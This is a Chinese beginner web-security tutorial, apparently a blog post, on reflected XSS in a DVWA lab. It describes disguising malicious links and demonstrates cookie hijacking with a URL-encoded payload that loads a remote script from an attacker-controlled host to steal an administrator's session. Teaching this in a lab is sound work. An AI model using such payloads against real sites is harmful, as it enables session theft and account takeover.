xss反射型post_反射型XSS 你要控技你记几

本文是Web安全入门系列的第8篇文章

01            

反射型XSS           

在XSS注入的时候,我们会经常看到这样的代码:

上一篇文章已经讲过了,这句代码并不能真正的跨站,它真正的作用是:

检测当前页面存在XSS攻击的可能性

说人话就是:能执行这句话说明实施XSS攻击的可能性较大,但不代表一定能成功;不能执行这句话,说明实施XSS攻击的可能性较小,但也不代表一定不能成功。

bb27eb16759c401dbbed270f4711c6e7.png

接下来回到我们的DVWA靶场,进入反射型XSS的页面,在输入框输入:

91579e33889f80e870ea5e351f12501c.png

提交之后弹框弹出,XSS代码执行成功:

8f36ad4f01ab10ce3d9e3215d64b5ea0.png

请注意地址栏的URL:http://192.168.174.136/dvwa/vulnerabilities/xss_r/?name=

从URL看出刚才的XSS代码被参数name接收了,并且在访问上面这个链接时,XSS被执行了。一旦我们在输入框重新填入内容,刚才的XSS就会被替代,因此,我们得把这个带有XSS代码的URL发送给目标用户,目标用户点击之后,才能实现攻击。

这里的XSS是非持久化的(没有被存储在服务器中),并且需要用户点击才能实现攻击,这就是反射型XSS。

02            

如何利用?            

反射型XSS需要攻击目标自己点击链接才能实现攻击,但是现实中不会这么直白的将XSS直接发给你。

d801fe6e8a980c3a29ffd5bf4ff20b12.png

通常的做法是将带有XSS的链接,经过包装后发出去,可能是一个短链接:

634c0d43890bdbe3fdb3e22860f1db87.png

也可能是一封看上去很正经的邮件:

0c64f41fc59b9536bb09476f12273a27.png

又或者是你想点击放大观看的你女神的照片:

2f0cb11b77ca37e0e3b0231a61a2b885.png

看上去花样繁多,防不胜防,然鹅,这样的攻击方式有一个致命缺陷:

只要你不点,它就没办法

        9d51328b1c1db83b55faefe58f799b27.png     

6070177c930f351e64303a530cbbfe68.png

03            

怎么跨站?            

接下来演示一下真正的跨站攻击过程,如果有小伙伴已经跃跃欲试,请先按住躁动的心,复习一下网络安全法

b761ab0c7ef5074373e7258a5c5fcc61.png

学习和做实验请记得使用靶场,不要触犯红线。

27096c49af98477b4e341b0d273b9d10.png

我们用最常见的cookie劫持作为例子,先用dvwa靶场的非admin用户smithy进行登录:

8b06aa1bca2c2f9ba6f9a99204d6fc4f.png

登录后会在页面左下角显示用户名:

765d4815a14125d57bf635daf844896f.png

假设Smith同学发现了一个反射型XSS,然后又发现cookie记录了用户登录凭证,且没有设置HttpOnly为true:

e67f708d6f5a3e24085faaff694ff19e.png

545223876d95d5f6a5e778850ebf496a.png

然后Smith同学做了一些事情

191c266e23f9c07014e534ba70d10267.png

1. 将劫持cookie的脚本放在了这个站点:http://192.168.174.133/xss/template/default.js

2. 将反射型XSS的地址发给了管理员:http://192.168.174.136/dvwa/vulnerabilities/xss_r/?name=%3Cscript+src%3Dhttp%3A%2F%2F192.168.174.133%2Fxss%2Ftemplate%2Fdefault.js%3E%3C%2Fscript%3E#

3. 管理员也登录了该网站,收到了Smith发来的链接,管理员木有控制住记几,点了一下

4. Smith同学接收到了脚本返回的数据,拿到了管理员的cookie

e67725068f4b6c2d0c4388dc169768a2.png

5. Smith同学将自己的cookie改成了刚刚拿到的管理员的cookie

5d66d29f0ec3b541162cdc40e54c5397.png

6.Smith同学就可以以管理员的身份登录网站了:

e3d95df6a7c02c1d9bdf1114175f8391.png

小伙伴们可能会问:Smith同学怎么知道谁是管理员的呢?现实中确实没有这么容易,我只是举个小小的例子

ece6f5f85fde0de166311cc85e1c7342.png

最后,希望大家都控制好记几,不要随便点击任何来历不明的链接~

1cabed1cbae339e9062f11f13b9620f4.png

(部分图片源自网络,侵删)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值